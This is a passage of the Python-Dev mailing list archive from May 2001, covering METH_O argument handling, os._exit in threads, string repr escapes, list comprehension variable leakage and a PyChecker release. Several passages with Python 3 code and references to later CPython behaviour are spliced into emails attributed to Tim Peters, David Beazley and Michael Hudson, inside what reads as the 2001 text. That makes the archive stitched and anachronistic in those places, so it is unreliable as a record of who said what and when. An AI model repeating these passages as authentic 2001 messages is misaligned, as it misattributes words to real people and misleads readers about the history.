that *he* had a non-zero chance of implementing his suggestion.  That makes
it far closer to reality than anything that's been suggested since <wink>.


From tim.one at home.com  Tue May 29 02:42:54 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:42:54 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B121814.E5E9896A@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAAKFAA.tim.one@home.com>

[MAL]
> If we end up only optimizing the re.match("O+") case, we wouldn't need
> the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
> and Martin could call the underlying API with one or more PyObject*
> taken directly from the Python VM stack.

How then does the callee know it was called with the correct # of arguments?
By adding enough pointer arguments to cover the longest possible O+ string
plus 1, then verifying that the one just beyond the last one it expects is
NULL, while the ones before that are not?  Adding another "# of arguments"
member to the method table?  Inventing METH_O, METH_OO, METH_OOO, ...?

> In that case, please consider at least supporting "O", "OO" and "OOO"
> with optional arguments treated like I suggested in an earlier
> posting (simply pass NULL and let the API take care of assigning
> a default value).
>
> This would take care of most builtins:

You don't have to convince me that cases other than plain "O" exist.  What's
missing is data in support of the idea that calls to those are relatively
frequent enough that it's a NET win to slow plain "O" in order to speed the
additional cases when they happen.  For example, it's not possible for calls
to reduce() to have a high hit rate in real life, because builtin_reduce is
a very expensive function -- there's only so many of those you can cram into
a second even if the calling overhead is 0.  OTOH, add a single branch to
the time it takes to find builtin_type and you've slowed its *total*
execution time significantly.

The implementation of METH_O alone is a pure win by any measure.  So would
be implementing METH_OO alone, or METH_OOO alone, etc.  Mix them, and they
all get slower than they could have been.  All the data we have says METH_O
is the single most important case, and that jibes with common sense, so I
believe it.

If you want to speed everything, fine, do that, but that likely requires a
preprocessing phase so that type signatures don't have to be resolved at
runtime at all.  So long as we're just looking at simple hacks, "the simpler
the better" is good advice and should rule in the absence of compelling
evidence against it.


From tim.one at home.com  Tue May 29 03:14:16 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:14:16 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEABKFAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> Because it is a METH_OLDARGS method, you can do
>
> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")
>
> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Guido won't, and if he had even a twinge of doubt, Thomas's explanation of
how this bug was introduced in 2.0 would erase it.  The list.append() docs
were arguably unclear when that brouhaha hit, but there's nothing unclear
about the file.writelines() docs.

OTOH, the file.writelines() docs still say a list is required, not "a
sequence" as the 2.0 (+ current) code actually implements.

Hmm.  Wonder whether writelines() should be generalized to allow an iterable
object?


From tim.one at home.com  Tue May 29 03:49:29 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:49:29 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>

[Aahz]
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

[Tim]
> Please open a bug report on that, then, with a tiny test case
> if possible.
> This worked fine on Win98SE for me just now:

[Aahz]
> Futz.  *Now* it works.  <sigh>

Now *what* works?  The test case I posted, or the original test case you
tried (which you didn't post)?

> Chalk it up to another unreproducible bug caused by an unstable Win98.

Actually doubt it -- threads are very reliable on Win98, despite that little
else is (malloc() is flaky, popen() is a nightmare, etc).

Here's a recent bug report on a Red Hot box that may be related:

http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735

I have no idea what's supposed to happen if you call os._exit from a
*spawned* thread (perhaps that's what you did too?  I did not) -- threads
are outside the scope of the C std, so I suppose it's a x-platform
crapshoot.


From greg at cosc.canterbury.ac.nz  Tue May 29 04:12:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:12:55 +1200 (NZST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>

> I took a special look at METH_OLDARGS occurrences.

Shouldn't all these be removed? I would have thought
list.append was the last one!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Tue May 29 04:33:58 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:33:58 +1200 (NZST)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz>

Samuele Pedroni writes:
> I imagine a (new) function that produces a snapshot of the values in the
> local, free and cell vars of a scope can do the job required for simple
> debugging

I think there should be methods operating directly
on stack frames for debuggers to use.


From jepler at mail.inetnebr.com  Tue May 29 04:32:05 2001
From: jepler at mail.inetnebr.com (Jeff Epler)
Date: Mon, 28 May 2001 21:32:05 -0500
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400
References: <20010524045938.5228199C83@waltz.rahul.net> <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>
Message-ID: <20010528213205.A1236@localhost.localdomain>

On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote:
> Here's a recent bug report on a Red Hot box that may be related:
> 
> http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
> 
> I have no idea what's supposed to happen if you call os._exit from a
> *spawned* thread (perhaps that's what you did too?  I did not) -- threads
> are outside the scope of the C std, so I suppose it's a x-platform
> crapshoot.

I wrote that program after the first go-round about _exit and threads,
and when I got behavior I didn't expect, I entered it in the SF bug
tracker.

My reasoning: The documentation for _exit() says it is "used to exit the
child process after a fork()", and my model for thinking about threads
is that they're "child processes, but ...".  Thus, invoking os._exit()
in a thread made sense to me, meaning "ask the OS to destroy this thread
now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a
good one, though my suspicion (which I did not voice in the SF report)
was that perhaps the thread which called _exit() held the GIL, in which
case it was in some sense Python's fault that execution didn't continue.
In any case, I don't have the faintest idea how to program threads in
C/pthreads, so I can't write the "equivalent C program".

In fact, a traceback from the hung "sleep(1)" thread shows

(gdb) where
#0  0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934
#2  0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34
#3  0x08067ba0 in PyThread_acquire_lock () at eval.c:41
#4  0x08051ff1 in PyEval_RestoreThread () at eval.c:41
#5  0x40019ef9 in floatsleep () at eval.c:41
#6  0x400193fd in time_sleep () at eval.c:41
[...]

While those line numbers look a little fishy (eval.c:41 for all three
frames?), I think this might support my supposition.

Of course, if os._exit() has no intended use in a threaded program, then
this behavior is as good as any.  <wink>

Jeff


From tim.one at home.com  Tue May 29 06:03:38 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:03:38 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010528213205.A1236@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKFAA.tim.one@home.com>

[Jeff Epler, on
 http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
]
> My reasoning: The documentation for _exit() says it is "used to exit the
> child process after a fork()", and my model for thinking about threads
> is that they're "child processes, but ...".  Thus, invoking os._exit()
> in a thread made sense to me, meaning "ask the OS to destroy this thread
> now, but leave my file descriptors, etc., alone for the other threads."

You need a Linux expert to address this.  Threads and processes are
different beasts under most flavors of Unix, but Linux confuses them; I've
no idea how _exit() is supposed to work there, and that's why I asked (in
the bug report) what the Linux docs say about that (_exit() is supplied by
your local C library; Python just wraps it).

If what you really wanted was just to abort the thread, use thread.exit()
(see the thread docs).  os._exit() is a dangerous thing even in the best of
conditions; unsure why the Python docs suggest using it.
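A small demonstration of the thread-only exit recommended above, written against Python 3, where the old thread module is spelled _thread: _thread.exit() raises SystemExit, which ends only the calling thread, and the threading machinery discards it silently.

```python
import _thread
import threading

events = []


def worker():
    events.append("started")
    _thread.exit()                 # raises SystemExit in this thread only
    events.append("never reached")


t = threading.Thread(target=worker)
t.start()
t.join()
events.append("main thread still running")
print(events)   # ['started', 'main thread still running']
```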

> Your suggestion in the tracker of writing the equivalent C program is a
> good one, though my suspicion (which I did not voice in the SF report)
> was that perhaps the thread which called _exit() held the GIL, in which
> case it was in some sense Python's fault that execution didn't continue.

Ah, makes sense!  Yes, I bet that's what's happening.  If so, there's
nothing Python can do about it:  I'm afraid you did it to yourself.  _exit()
specifically asks that no cleanup processing be done, and when Python calls
it Python never regains control.  If you had done an actual fork, fine, the
*process* doing the _exit() would never come back to Python, but the GIL in
that process has nothing to do with the GIL in the parent process.  But
threads share the same GIL, and if you _exit() from a thread holding the GIL
then no other thread can ever run again.
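The failure mode can be imitated with an ordinary lock standing in for the GIL. This is only an analogy (a threading.Lock, not the real interpreter lock): a thread takes the lock and disappears without releasing it, and every later acquirer is stuck. The timeout exists only so the demonstration finishes.

```python
import threading

gil = threading.Lock()   # stand-in for the interpreter lock (analogy only)


def vanishing_holder():
    gil.acquire()
    # Like _exit() from a thread: this thread goes away without ever
    # running the code that would release the lock.
    return


holder = threading.Thread(target=vanishing_holder)
holder.start()
holder.join()

# Any other thread that needs the lock now waits forever; the timeout
# is here only so this demonstration terminates.
got_it = gil.acquire(timeout=0.5)
print("acquired:", got_it)   # acquired: False
```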

Looks like it's also platform-dependent:  on Windows, _exit() kills the
process and every thread ever spawned by that process.  Since C doesn't say
anything about threads, that can't be called right or wrong.  Looks like on
Linux _exit() only kills the thread that calls it.

> ...
> Of course, if os._exit() has no intended use in a threaded program,

Right, it wasn't -- unless your program panics and wants to get out ASAP no
matter what the consequences.

> then this behavior is as good as any.  <wink>

And better than most <heh>.


From tim.one at home.com  Tue May 29 06:16:46 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:16:46 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>

[Martin]
> I took a special look at METH_OLDARGS occurrences.

[GregE]
> Shouldn't all these be removed? I would have thought
> list.append was the last one!

I count 42 of them remaining, usually for 0-argument functions.
METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can
distinguish between "called with nothing" and "called with something" under
OLDARGS.  However, they don't appear to catch keyword args:

>>> {}.clear(2)  # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666)  # accepts nonsense silently
>>>
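For contrast, the zero-argument case was later given its own convention (METH_NOARGS), and in current CPython 3 dict.clear() rejects both mistakes. The rejects() helper is only test scaffolding:

```python
def rejects(call):
    """Return True if call() raises TypeError."""
    try:
        call()
    except TypeError:
        return True
    return False


d = {"a": 1}
print(rejects(lambda: d.clear(2)))                      # True
print(rejects(lambda: d.clear(val=12, hohoho=666)))     # True
d.clear()
print(d)                                                 # {}
```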

the-more-you-look-the-messier-it-gets-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:06:19 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:06:19 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEAMKFAA.tim.one@home.com>

ESR> Apparently the Universe is an even more random place than I
ESR> thought.

[Barry A. Warsaw]
> here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,

That's what Einstein believed (i.e., that it isn't truly random).
Unfortunately, according to another recent thread, Einstein was afraid to
use equations because he didn't want to cut Stephen Hawking's editor's penis
in half -- or something like that.  Whichever, consensus still holds that
Einstein lost this one.

i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace-
    crying-for-help-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:15:07 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:15:07 -0400
Subject: [Python-Dev] RE: What happened to Idle's extend.py?
In-Reply-To: <f9b3eae9.0105231419.7d093237@posting.google.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEANKFAA.tim.one@home.com>

Guido's on vacation.  Anyone have an answer for this?  I don't, and can't
make time to dig into it now.

If you can, David's address showed up as mailto:boogiemorg at aol.com

> -----Original Message-----
> From: python-list-admin at python.org
> [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler
> Sent: Wednesday, May 23, 2001 6:20 PM
> To: python-list at python.org
> Subject: What happened to Idle's extend.py?
>
>
> Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was
> used to extend Idle. We've used this extensively, building entire
> "applications" as Idle extensions.
>
> Now that we're moving to Python 2.1, we find the same old directions
> for extending Idle (in extend.txt), but there appears to be no
> extend.py in Idle-0.8.
>
> Does anyone know how we can add extensions to Idle-0.8?
>
> Thanks in advance,
> David
> --
> http://mail.python.org/mailman/listinfo/python-list


From mwh at python.net  Tue May 29 10:00:42 2001
From: mwh at python.net (Michael Hudson)
Date: Tue, 29 May 2001 09:00:42 +0100 (BST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>
Message-ID: <Pine.SOL.4.33.0105290854520.24723-100000@yellow.csi.cam.ac.uk>

On Tue, 29 May 2001, Tim Peters wrote:

> [Martin]
> > I took a special look at METH_OLDARGS occurrences.
>
> [GregE]
> > Shouldn't all these be removed? I would have thought
> > list.append was the last one!
>
> I count 42 of them remaining, usually for 0-argument functions.

There are more than that; PyMethodDefs that don't put anything in that
slot in the source are METH_OLDARGS too, and there are quite a few of them
in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the
older modules - gl, rotor were easy to find).  There are also quite a lot
of functions that put literal zeros there, too.

So METH_OLDARGS is far from dead, sadly.
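Finding those stragglers is mostly a search problem. A heuristic Python sketch (a regular expression, not a C parser, so multi-line or macro-generated entries will be missed; oldargs_methods is a hypothetical name) that lists method-table entries whose flags field is absent, a literal 0, or METH_OLDARGS:

```python
import re

# Matches one brace-enclosed initializer with a quoted name, e.g.
#   {"append", (PyCFunction)listappend, METH_O, append_doc},
#   {"clear",  dict_clear},
# The {NULL, NULL} sentinel has no quoted name and is skipped.
ENTRY = re.compile(r'\{\s*"(?P<name>[^"]+)"\s*,(?P<rest>[^{}]*)\}')


def oldargs_methods(c_source):
    """Return names of entries whose flags field is missing, a literal 0,
    or METH_OLDARGS (all of which mean METH_OLDARGS)."""
    found = []
    for m in ENTRY.finditer(c_source):
        fields = [f.strip() for f in m.group("rest").split(",")]
        fields = [f for f in fields if f]
        # fields[0] is the C function; fields[1], if present, the flags.
        if len(fields) < 2 or fields[1] in ("0", "METH_OLDARGS"):
            found.append(m.group("name"))
    return found


sample = '''
static PyMethodDef methods[] = {
    {"append", (PyCFunction)listappend, METH_O, append_doc},
    {"clear",  dict_clear},
    {"rotor",  rotor_rotor, 0},
    {"get",    dict_get, METH_VARARGS, "D.get(k[,d]), with comma"},
    {NULL, NULL}
};
'''
print(oldargs_methods(sample))   # ['clear', 'rotor']
```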

Cheers,
M.


From tim.one at home.com  Tue May 29 10:04:48 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 04:04:48 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBBKFAA.tim.one@home.com>

[from Monday, May 21, 2001 1:04 PM]

[Tim]
>> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

[Martin v. Loewis]
> Any reason why PyThreadState_GET isn't used there?

Perhaps somebody's shift key got jammed?

sure-don't-see-a-good-reason-ly y'rs  - tim


From thomas at xs4all.net  Tue May 29 11:52:01 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 29 May 2001 11:52:01 +0200
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
Message-ID: <20010529115201.J676@xs4all.nl>

Robin apparently ran into a real problem caused by the change in string
repr() semantics. Now, arguably this is his own stupid fault <wink> (and
indeed he argues that himself) but that doesn't mean we shouldn't take this
into account. We could, for instance, revert 2.1.1 to the old behaviour,
giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide
what the string repr() change really wanted was just for the REPL to print
it like this, in which case the displayhook should fix it, not string_repr.

Opinions ? Ping, IIRC, this was your proposal, so yours would be especially
valuable ;)

----- Forwarded message from Robin Becker <robin at jessikat.fsnet.co.uk> -----

Date: Tue, 29 May 2001 09:58:49 +0100
From: Robin Becker <robin at jessikat.fsnet.co.uk>
To: Thomas Wouters <thomas at xs4all.net>
Cc: python-list at python.org
Subject: Re: string repr in 2.1

In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters
<thomas at xs4all.net> writes
>On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote:
>> In article <slrn9h5m4o.1hk.scarblac at pino.selwerd.nl>, Remco Gerlich
>> <scarblac at pino.selwerd.nl> writes
>
>> >Since 2.1, string repr uses hexadecimal escapes instead of octal ones.
>
>> yes I guess all those *nix tools that like octal should be whipped and
>> made to obey the malevolent dictator.
>
>Do you have tools you use to parse quoted (repr'd) Python strings that
>handle octal correctly, but don't handle \x and \n\r escape codes ? Which
>ones ? And were you aware that they were going to break sooner or later,
>just because someone can prefer 'readable' escape codes and feed it that
>instead ? :)
>
Yes, I have such tools. One is called Acrobat Reader; others are
traditional sed and awk. My DOS grep doesn't seem to like hex; I suppose
I must update it and all the other tools.
 
My C compiler understands octal and the newer ones do hex as well.

I can probably read octal and do arithmetic in it more easily than hex. I
don't defend the octal representation; it's just very widespread in the
older tools. Our usage of repr was probably stupid, as clearly repr can
change.

How I long for my 18-bit PDP-15 :) what happened to my 15-octal-digit
CDC! Oh woe is me! Where are the duodecimal calculators of yore?
-- 
Robin Becker


----- End forwarded message -----

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From akuchlin at mems-exchange.org  Tue May 29 16:04:37 2001
From: akuchlin at mems-exchange.org (Andrew Kuchling)
Date: Tue, 29 May 2001 10:04:37 -0400
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us> <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>
Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us>

On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote:
>  It looks like I never replied to this.  It's probably dropped off
>your radar, but I'd say the answer is that the files on parrot should
>be discarded sooner rather than later -- when we actually manage to

Done.  Out of paranoia about doing 'rm -rf' within www.python.org's
tree, the files aren't deleted; instead I just moved them to my home
directory on parrot.

--amk


From aahz at rahul.net  Tue May 29 17:47:13 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Tue, 29 May 2001 08:47:13 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com> from "Tim Peters" at May 28, 2001 09:49:29 PM
Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> [Aahz]
> > Futz.  *Now* it works.  <sigh>
> 
> Now *what* works?  The test case I posted, or the original test case you
> tried (which you didn't post)?

My original test case.  I didn't actually preserve it, so the code below
was my attempt to reconstruct it (but I think it's pretty close to the
test case I tried).  Don't worry, if I run into this again, I'll be
*much* more careful about preserving the evidence and fiddling with
variations; last time I just assumed it was pilot error.

from threading import Thread
import os

class Foo(Thread):
    def run(self):
        while 1:
            pass

f = Foo()
f.start()
os._exit(1)


From beazley at cs.uchicago.edu  Tue May 29 18:56:09 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Tue, 29 May 2001 11:56:09 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>

I'm not sure if this has ever been brought up before (I don't recall
seeing it), but I would like to throw out something that has been
bugging me about list comprehensions for quite some time...

First of all, I have to say that I've really grown to like list
comprehensions a lot.  In fact, I find myself using them in just about
every Python program I've been writing since switching to Python 2.0.
However, I've also been shooting myself in the foot a little more than
usual due to the following issue:

When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x"
is bound in the local scope (and replaces any previous binding
to "x" that might have existed outside the context of the list
comprehension).    Because of this, I have frequently found myself
debugging the following programming error:

   # Some loop
   for x in r:
       ...
       # bunch of statements
       ...
       s = [expr(x) for x in t]
       ...
       # Try to do something with x.
       # ???? What in the hell is wrong with my program ????
       ...

The main problem is that I conceptually tend to think of the list
comprehension as being some kind of list operator where the index name
is really one of the operands in some sense.  Because of this, it is
*VERY* easy to get in the habit of throwing list comprehensions all
over the place, each of which uses a common index name like x,i,j,
etc.  Of course, this works just fine until you forget that you're
also using x,i,j for some kind of loop variable someplace else :-).
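Because a 2.x list comprehension binds its target exactly as the equivalent for loop does, the trap can be reproduced with the loop spelled out by hand. A minimal sketch; the sequences r and t and the list seen are illustrative stand-ins, not taken from any real program:

```python
# Illustrative data: r and t are hypothetical stand-ins for real sequences.
r = ["a", "b"]
t = [1, 2, 3]
seen = []

for x in r:
    # Spelled-out equivalent of:  s = [x * 2 for x in t]
    s = []
    for x in t:
        s.append(x * 2)
    # The programmer expects x to still be "a" (then "b") here,
    # but the inner loop has rebound it to the last item of t.
    seen.append(x)

print(seen)  # [3, 3]
```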

Therefore, I'm wondering if it would make any sense to make the
iterator variables used inside of a list comprehension private in some
manner--either through name mangling or some other technique? For
example:

   s = [expr(x) for x in t]

would get expanded into something roughly like this:

   s = [ ]
   for _mangled_x in t:
       s.append(expr(_mangled_x))
   del _mangled_x
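A hand-written version of that expansion, as a sketch (expr here is a hypothetical stand-in for the comprehension's expression), shows that a pre-existing x survives:

```python
def expr(v):
    # Hypothetical stand-in for the comprehension's expression.
    return v * 10

x = "outer"
t = [1, 2, 3]

# Hand-written form of the proposed expansion of
#     s = [expr(x) for x in t]
s = []
for _mangled_x in t:
    s.append(expr(_mangled_x))
del _mangled_x

print(s)  # [10, 20, 30]
print(x)  # outer: the earlier binding is untouched
```

One wrinkle in the expansion as written: if t is empty, the loop never binds _mangled_x, so the del raises NameError; a real implementation would need to guard against that.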

Just as an aside, I have never intentionally used the iterator
variable of a list comprehension after the operation has completed. I
was actually quite surprised with this behavior the first time I saw
it.  I suspect most other programmers would not anticipate this side
effect either.

Comments?

Cheers,

Dave


From nas at python.ca  Tue May 29 19:01:41 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 29 May 2001 10:01:41 -0700
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529100141.B18974@glacier.fnational.com>

David Beazley wrote:
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

I've been bitten by this one once.  It took a while to figure out
the problem.  I'm not sure that we can change it now though.

  Neil


From skip at pobox.com  Tue May 29 21:03:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Tue, 29 May 2001 14:03:47 -0500
Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd)
Message-ID: <15123.62099.473259.545781@beluga.mojam.com>


I pass this along in case anyone here has some ideas for Jeff about how to
work around his problems with pyexpat.c.

Skip

-------------- next part --------------
An embedded message was scrubbed...
From: Jeff Rush <jrush at taupro.com>
Subject: [Stackless] Stackless for 2.1: Progress Report
Date: Tue, 29 May 2001 13:06:12 -0500
Size: 3437
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010529/6d6875ae/attachment-0001.eml>

From gward at python.net  Tue May 29 23:21:55 2001
From: gward at python.net (Greg Ward)
Date: Tue, 29 May 2001 17:21:55 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529172155.A8737@gerg.ca>

On 29 May 2001, David Beazley said:
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner--either through name mangling or some other technique? For
> example:

Two ideas occur to me:
  * make the list comprehension a new scoping level, which of course
    is doable now that we have sensible scoping semantics.  Presumably
    the usual warning message about shadowing variables from an
    outer scope will apply; you'll still have the bug in your code,
    but at least Python will tell you about it

  * don't make list comprehensions a separate scope, but add a
    little trickery so that something *like* the "shadowing variable
    from an outer scope" message is emitted
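The scoping half of the first idea can be approximated by hand today by giving the loop its own function scope. A minimal sketch (the helper name doubled is hypothetical); it says nothing about the shadowing warning:

```python
def doubled(seq):
    # The loop variable i lives in this function's own local scope,
    # so rebinding it cannot disturb a caller's i.
    result = []
    for i in seq:
        result.append(2 * i)
    return result

i = 12
a = doubled([1, 2, 3])
print(a)  # [2, 4, 6]
print(i)  # 12
```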

Haven't really thought about backwards compatibility issues...

        Greg


From paulp at ActiveState.com  Tue May 29 23:55:03 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Tue, 29 May 2001 14:55:03 -0700
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
References: <20010529115201.J676@xs4all.nl>
Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com>

Thomas Wouters wrote:
> 
> Robin apparently ran into a real problem caused by the change in string
> repr() semantics. Now, arguably this is his own stupid fault <wink> (and
> indeed he argues that himself) but that doesn't mean we shouldn't take this
> into account. 

I think it is done now and it is better this way. The pain is over.
Reverting would hurt someone else again.

Displayhook should be used sparingly. One of the major virtues of the
REPL is that it behaves so much like standard Python.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From tim at digicool.com  Wed May 30 00:54:01 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 29 May 2001 18:54:01 -0400
Subject: [Python-Dev] Re: Time for the yearly list.append() panic
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEKACAAA.tim@digicool.com>

FYI, I checked in a variation (listobject.c) over the weekend.

Win9x is ultimately hopeless, but we can grow a list there to about 35M
elements now instead of crapping out at < 2M, and it's zippy the whole way
until death.

Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was
obvious very early there.  Now it's flat and fast until physical RAM is
exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize
points.

Fred kindly confirmed that Linux isn't hurt.  Its behavior looks the same as
the new Win2K behavior, except that the Linux hiccups are much briefer
(although still obvious when they occur).

time-for-the-yearly-list.append()-celebration-ly y'rs  - tim


From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <3B145FC9.49813488@metaslash.com>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of Python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks to everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

